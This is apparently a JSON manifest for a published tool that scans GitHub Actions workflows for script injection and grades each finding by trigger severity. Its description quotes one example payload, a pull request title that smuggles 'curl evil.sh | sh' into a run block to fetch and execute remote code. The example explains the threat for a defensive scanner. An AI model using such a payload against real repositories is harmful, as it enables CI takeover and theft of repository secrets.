{"actions":{"bootstrapAndRun":{"effect":"installs rote if missing, inspects, prepares, and asks before running","href":"https://play.modiqo.ai/install?play=lgoyal6/workflow-injection@0.3.0","method":"GET","rel":"https://rote.dev/rels/bootstrap-and-run","requiresConsent":true,"responseMediaType":"text/x-shellscript"},"inspect":{"command":"rote play inspect https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0","effect":"read-only"},"installCliOnly":{"effect":"installs the rote CLI, nothing else","href":"https://play.modiqo.ai/install","method":"GET","rel":"https://rote.dev/rels/install-cli","requiresConsent":true,"responseMediaType":"text/x-shellscript"},"run":{"command":"rote play run https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0","effect":"executes the play locally after consent","headless":{"approvalAssertion":"--yes","approvalRequiredBeforeInvocation":true,"commandTemplate":"rote play run https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0 <name=value...> --yes","stdinPolicy":"never pipe input to automate the interactive Ready selector"},"requiresConsent":true}},"description":"Answers one question about your CI: can somebody who opens a pull request or an issue run code in it? A GitHub Actions runner substitutes every \u0024{{ ... }} as TEXT into the script before bash ever sees it, so a pull request titled \u0060\"; curl evil.sh | sh; #\u0060 becomes a command rather than a string. This finds every attacker-controlled expression interpolated into a \u0060run:\u0060 block, or into actions/github-script's \u0060script:\u0060, which is the same eval sink one language over, and grades each one by the trigger that reaches it, because the trigger is the entire difference between a nuisance and a repository takeover: under pull_request_target, issue_comment, issues, pull_request_review, workflow_run or discussion the job holds the base repository's secrets and a writable token, so an injection is critical; under plain pull_request a fork runs with no secrets and a read-only token, so the same expression is medium; and an expression whose field no declared trigger ever populates is reported, graded low, and said to be unrea","distribution":{"digest":"sha256:d2d5cc3ba257885d36b2a9bf8a4bc66949552f42885944d09c41dc5cf4a39903","mediaType":"application/vnd.modiqo.rote-flow","size":33540,"verifiedBy":"rote verifies the downloaded archive against this digest before it runs"},"effects":{"credentialsProvidedBy":"runner","credentialsRemainLocal":true,"declaredWrites":[],"publisherReceivesCredentials":false},"id":"https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0","inputPolicy":{"optionalWithDefault":"show_default_and_accept_override","optionalWithoutDefault":"omit_unless_supplied","required":"ask","secrets":"collect_locally_outside_conversation"},"links":{"docs":"https://rote.dev","page":"https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0","protocol":"https://play.modiqo.ai/.well-known/rote","self":"https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0.json"},"name":"workflow-injection","owner":{"kind":"user","slug":"lgoyal6"},"parameters":[{"description":"Directory tree to search for .github/workflows directories; every workflow found is graded on its own \u0060on:\u0060 block, because severity here is decided by the trigger","example":".","input":{"allowCustom":true,"choices":[],"label":"Root"},"name":"root","required":true,"type":"string"},{"default":"4","description":"How many directory levels below root a .github directory may sit, so a folder full of checkouts can be audited repo by repo; a repo checked out directly at root is depth 1","example":"3","input":{"allowCustom":true,"choices":[],"label":"Depth"},"name":"depth","required":false,"type":"string"},{"default":"12","description":"How many findings each workflow file reports; exact totals are always kept, only the printed list is capped","example":"6","input":{"allowCustom":true,"choices":[],"label":"Top"},"name":"top","required":false,"type":"string"}],"preparation":[{"action":{"command":"rote play inspect https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0 --json","effect":"read-only"},"step":1,"type":"inspect_local_readiness"},{"references":["/parameters"],"step":2,"type":"collect_parameters"},{"references":["/parameters","/requirements","/effects"],"step":3,"type":"review"},{"consentBoundary":"the user approves the exact play and parameter values","references":["/parameters","/requirements","/effects"],"step":4,"type":"obtain_run_consent"},{"action":{"command":"rote play run https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0","headlessCommandTemplate":"rote play run https://play.modiqo.ai/lgoyal6/workflow-injection@0.3.0 <name=value...> --yes"},"preservesAcquisitionBoundaries":["adapter_selection","oauth_dcr","google_discovery","static_token_setup","runtime_security_checks"],"requiresConsent":true,"step":5,"type":"run"}],"producedBy":{"roteVersion":"0.78.0"},"publishedAt":"2026-09-04T04:33:24.280615+00:00","reference":"lgoyal6/workflow-injection@0.3.0","requirements":{"adapters":[],"browser":{"dependencies":[],"runtime":false,"signIn":false},"localTools":["bash","python3","find","sort","mktemp","rm","wc","tr","head"],"roteCli":{"minimumVersion":"0.62.0"},"sessions":false},"resolution":"pinned","schema":"rote.play.v1","stats":{"downloads":2,"installs":0},"steps":{"count":2,"names":["analyze","discover"]},"title":"workflow-injection","type":"play","version":"0.3.0","visibility":"public"}